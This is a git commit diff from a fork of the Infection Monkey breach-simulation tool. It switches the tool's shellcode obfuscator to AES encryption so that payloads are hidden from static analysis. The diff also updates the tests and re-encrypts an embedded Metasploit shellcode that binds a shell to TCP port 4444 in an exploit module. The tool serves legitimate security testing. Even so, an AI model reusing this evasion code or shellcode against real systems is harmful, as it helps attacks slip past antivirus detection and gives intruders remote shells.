forked from p15670423/monkey
Merge pull request #964 from guardicore/payload_obfuscation
Payload obfuscation
This commit is contained in:
commit
de3adfd483
|
@ -1,23 +1,30 @@
|
||||||
# This code is used to obfuscate shellcode
|
# This code is used to obfuscate shellcode
|
||||||
# Usage:
|
# Usage:
|
||||||
# shellcode_obfuscator.py [your normal shellcode].
|
# shellcode_obfuscator.py [your normal shellcode].
|
||||||
# For example:
|
|
||||||
# shellcode_obfuscator.py "\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
|
|
||||||
# This returns "\x30\x76\x7b\x07\xa8\x3d\x7e\x62\xe0\x5d\x4b\xc9\xf6\x3d\x52"
|
|
||||||
# Verify that it's the same shellcode, just reversed and paste it in code.
|
|
||||||
# Then clarify it before usage to reverse it on runtime.
|
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
|
# PyCrypto is deprecated, but we use pycryptodome, which uses the exact same imports
|
||||||
|
from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413
|
||||||
|
|
||||||
def obfuscate(shellcode: str) -> str:
|
# We only encrypt payloads to hide them from static analysis
|
||||||
shellcode = shellcode.split('\\')[::-1]
|
# it's OK to have these keys plaintext
|
||||||
return '\\'+'\\'.join(shellcode)[:-1]
|
KEY = b'1234567890123456'
|
||||||
|
NONCE = b'\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f'
|
||||||
|
|
||||||
|
|
||||||
def clarify(shellcode: str) -> str:
|
# Use this manually to get obfuscated bytes of shellcode
|
||||||
return shellcode[::-1]
|
def obfuscate(shellcode: bytes) -> bytes:
|
||||||
|
cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE)
|
||||||
|
ciphertext, _ = cipher.encrypt_and_digest(shellcode)
|
||||||
|
return ciphertext
|
||||||
|
|
||||||
|
|
||||||
|
def clarify(shellcode: bytes) -> bytes:
|
||||||
|
cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE)
|
||||||
|
plaintext = cipher.decrypt(shellcode)
|
||||||
|
return plaintext
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
print(obfuscate(sys.argv[1]))
|
print(obfuscate(sys.argv[1].encode()))
|
||||||
|
|
|
@ -2,16 +2,14 @@ from unittest import TestCase
|
||||||
|
|
||||||
from common.utils.shellcode_obfuscator import clarify, obfuscate
|
from common.utils.shellcode_obfuscator import clarify, obfuscate
|
||||||
|
|
||||||
SHELLCODE_FROM_CMD_PARAM = '\\x52\\x3d\\xf6\\xc9\\x4b\\x5d\\xe0\\x62\\x7e\\x3d\\xa8\\x07\\x7b\\x76\\x30'
|
SHELLCODE = b'1234567890abcd'
|
||||||
OBFUSCATED_PARAM_OUTPUT = '\\x30\\x76\\x7b\\x07\\xa8\\x3d\\x7e\\x62\\xe0\\x5d\\x4b\\xc9\\xf6\\x3d\\x52'
|
OBFUSCATED_SHELLCODE = b'\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^='
|
||||||
OBFUSCATED_SHELLCODE = "\x30\x76\x7b\x07\xa8\x3d\x7e\x62\xe0\x5d\x4b\xc9\xf6\x3d\x52"
|
|
||||||
CLARIFIED_SHELLCODE = "\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
|
|
||||||
|
|
||||||
|
|
||||||
class TestShellcodeObfuscator(TestCase):
|
class TestShellcodeObfuscator(TestCase):
|
||||||
|
|
||||||
def test_obfuscate(self):
|
def test_obfuscate(self):
|
||||||
self.assertEqual(obfuscate(SHELLCODE_FROM_CMD_PARAM), OBFUSCATED_PARAM_OUTPUT)
|
assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE
|
||||||
|
|
||||||
def test_clarify(self):
|
def test_clarify(self):
|
||||||
self.assertEqual(clarify(OBFUSCATED_SHELLCODE), CLARIFIED_SHELLCODE)
|
assert clarify(OBFUSCATED_SHELLCODE) == SHELLCODE
|
||||||
|
|
|
@ -28,27 +28,36 @@ from infection_monkey.network.tools import check_tcp_port
|
||||||
LOG = getLogger(__name__)
|
LOG = getLogger(__name__)
|
||||||
|
|
||||||
# Portbind shellcode from metasploit; Binds port to TCP port 4444
|
# Portbind shellcode from metasploit; Binds port to TCP port 4444
|
||||||
OBFUSCATED_SHELLCODE = ("\xa9\xb6\x4a\x39\x56\x60\xb5\xba\xf6\xb2\xc0\x19\xc1\x66\xb5\xbb\x7f\x49\x2e"
|
OBFUSCATED_SHELLCODE = (b'4\xf6kPF\xc5\x9b<K\xf8Q\t\xff\xc94\xa9(\'\xa5%4m\xcd\xa0c\xd9'
|
||||||
"\x2d\x2a\x4a\x1d\x62\x79\x49\x7d\x16\x56\xdc\x9c\x16\xfa\x78\x4f\x30\x04\xde"
|
b'\xd4Y\xca\x80*\xa7S\x98\xb3n+k\xe5\xe3\xffR\x85\xf4k\xb2\xd3'
|
||||||
"\x9a\x16\xf8\xe3\x1b\xb8\xa8\xdc\x1b\xb8\xf8\xe4\x1d\xb2\x7f\x49\x0e\x9c\x56"
|
b'\xaa\x10*\x0f\xb5\xdc-W(\x9c\xfe\xfa\xb8\x0eT1\xce\x8a\x9b\x0c'
|
||||||
"\xa0\xf9\x17\xdb\xde\xe1\x42\x02\x8e\x30\x64\x3a\x9a\x08\x17\x84\xf4\xb4\x43"
|
b'\xd4"v\x04\xac~\xec\x04\xb07v\x81\xfd\xed\xd6\x11\x82\xbaN\x1f+'
|
||||||
"\x5a\x76\x7b\x0b\x20\xf2\x20\x0e\x20\x7a\x63\xb0\xf9\xdc\xaf\x60\xc4\xd5\x22"
|
b'\xd6\x9a\xda\xb5yyP\xf2\r\x8ev\x87\xed\x1eU\xa8\xcd\xc3\xba\x9c'
|
||||||
"\x8f\xcd\xdc\x2c\x39\x56\xe3\x9c\x16\xfe\xcf\x8c\x90\x4e\xde\xd9\x39\x56\xe3"
|
b'\x02\xf5\x7f\xb1\xed\xfaN(|\xf7\x1aBPw\xdf!\x86\xd2\x8a\xfe\x1b'
|
||||||
"\x1e\xbd\xf9\x60\xb5\xbe\xe0\x30\x03\x0c\xc1\x66\xb5\xbc\xfa\x60\xb5\xbe\x40"
|
b'\x01\xc3\x9d\x802\xeeQ\x13\xff\xde\x95\xe0u\xa5\x19\xc8\xdd'
|
||||||
"\x98\xe7\x4d\xc1\x66\xb5\xbc\xf8\xa6\x20\x3f\x56\xe1\x8d\x99\xb3\x12\x22\x7c"
|
b'\xab[\x86\xdf\xf8\x84\xc6{\xe0W\x9b\xb0[\x05bA\xfc\xde\xa8B'
|
||||||
"\x48\x3f\x19\x8f\xf5\xa7\x22\x8f\x79\x49\x19\xaa\xfa\xf5\x19\xba\xfa\xe5\x19"
|
b'\x91b\xfey\x152q4\x15\xa7\x91)\xe8\x8b@\xe8\x8bC\xfc\xa6\x7f'
|
||||||
"\x3f\x56\xe1\xe7\x1c\xa0\x6f\x22\x39\x56\xb4\x20\xbc\xab\xbe\xa7\x68\xcf\x53"
|
b'\xfc%!_\xef\xe8\x13\xc3\xb4NDA\x0e%\xee\xbdK]L\xa2\x83|\xb3'
|
||||||
"\xc3\xb6\x7f\x49\x1a\xd2\x55\x5b\x81\x81\x79\x49\x1e\xb6\x9b\xc5\x3d\x81\x9b"
|
b'\xa2\xd3\x97]\xd8b\x03\xa7\x0c}\x93\x85\x18\x16\xff\xf1\xfe'
|
||||||
"\x85\x22\x8f\xfa\xd0\x9c\x16\xf9\x5a\x44\xa7\x27\xde\x14\xe1\xe9\x3d\xe7\xf5"
|
b'\xff\xe0E\x0b\xb6\xdb\xdc\xe5\xdb\xc5zr\xf1\r3\xd0\xf5\x80'
|
||||||
"\xd9\x3d\x46\xa9\x22\x86\x09\x62\xcd\x6d\x7b\x2a\xc8\xaa\x6e\x85\x20\x3d\x66"
|
b'\x89\x86V\x97\x1a\xf2f\x95\x89\xd5\xce\x9a\xee\xa1\xcf\x97'
|
||||||
"\xea\x42\xb7\x56\xb6\x22\xfd\x46\x62\xcf\x5d\x4b\xcd\xf6\x3d\xaf\x9c\x81\x92"
|
b'\x92\xc5Bx{7\x0cv\xa6\x9d\xaaf\xa4\xb4\x1e\x9ex\x1f\x91N\xe7ZY'
|
||||||
"\x1e\xd2\x5d\x5d\x88\xe8\xa4\x7c\x8b\xee\xdd\x76\xce\x45\x30\x76\x7b\x07\xa8"
|
b'\xa90\xcd\x94\xb7\x800\'\r\x19W\x86\x9d~\x87\x9a\x8e\x8c\x90Gq'
|
||||||
"\x3d\x7e\x62\xe0\x5d\x4b\xc9\xf6\x3d\x52\xa6\x22\x59\x4b\x91\xac\xca\xc1\xd5"
|
b'\x84sB\x07\x10\x8etP\xa5\xfe\x89\x1b\xfe\x0f\xa9&\xab\x19\x1fh'
|
||||||
"\xec\x3d\x6e\xcd\xc5\x3d\x2a\x16\x56\x49\xb3\x01\xe4\x5d\x20\x15\xf4\xe2\xfc"
|
b'\x18b\xd2y\xbd\xd1\xefe\x14p\xe5{ZW\x00T\xf8\x89\x8d\r\xd48\xb1V'
|
||||||
"\xee\x83\xa9\xb6\x4a\xe9\x0e\x76\x81\x5e\xc0\xff\xff\xff\xff\xe8\xb0\xe9\x83"
|
b'\xd9\xc3%\x89\x9c\x8e\x11\x00\x96\xe3\xd8\x80\\\x07\xc8d\x7f:\xc3T'
|
||||||
"\xc9\x29\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90")
|
b'\xb8\xd1s#\xc0\x04\xcdL\xab\x87\xf0ff\xc2\x02\xe8j\x91\x0eF\x9c[\xb79'
|
||||||
|
b'\x13J\xcdf\xbd\x83\x84\xe2\x08\xe5\xcf\xb6\xda\xda\x07\xaa$\xfe($'
|
||||||
|
b'\x86\x0bO\xcb\x8fj\xf6\x15\xb9B\x82\x0c\x7f\xf5!\xad5j\xc7R\x1c'
|
||||||
|
b'\x95\xe7V^O\xdak\xa0q\x81\xf81\xe3lq{\x0f\xdb\ta\xe7>I,\xab\x1d'
|
||||||
|
b'\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J'
|
||||||
|
b'\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01\'\xa8\x03\x90\x01\xec\x13'
|
||||||
|
b'\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq'
|
||||||
|
b'\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8'
|
||||||
|
b'\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J'
|
||||||
|
b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-')
|
||||||
|
|
||||||
SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
|
SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode()
|
||||||
|
|
||||||
XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
|
XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
|
||||||
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
|
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
|
||||||
|
|
Loading…
Reference in New Issue